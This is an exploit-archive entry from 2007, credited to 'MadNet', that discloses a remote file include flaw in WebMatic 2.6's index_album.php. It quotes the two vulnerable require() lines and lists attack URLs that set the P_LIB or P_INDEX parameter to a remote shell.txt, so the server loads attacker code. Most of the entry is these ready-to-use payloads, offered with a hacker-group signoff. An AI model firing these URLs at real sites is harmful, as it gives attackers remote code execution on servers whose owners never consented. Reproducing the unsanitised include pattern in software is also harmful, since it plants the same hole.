id: 1484
date: 02/07/2007
title: WebMatic 2.6 (index_album.php) Remote File Include Vulnerability
author: MadNet
cves: 

================================================================
WebMatic 2.6 (index_album.php) Remote File Include Vulnerability
================================================================



-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

--------------------------------------*******************-----------------------------------------------------------


Error1 :  require($P_LIB."lib_album.php");

Error2 :  require($P_INDEX."page_album.inc");


[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]

-------------------------------------------------

Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

-- MadNet From Turkey & Cyber-Sabotger Orgeneral  --



#  0day.today [2023-03-21]  #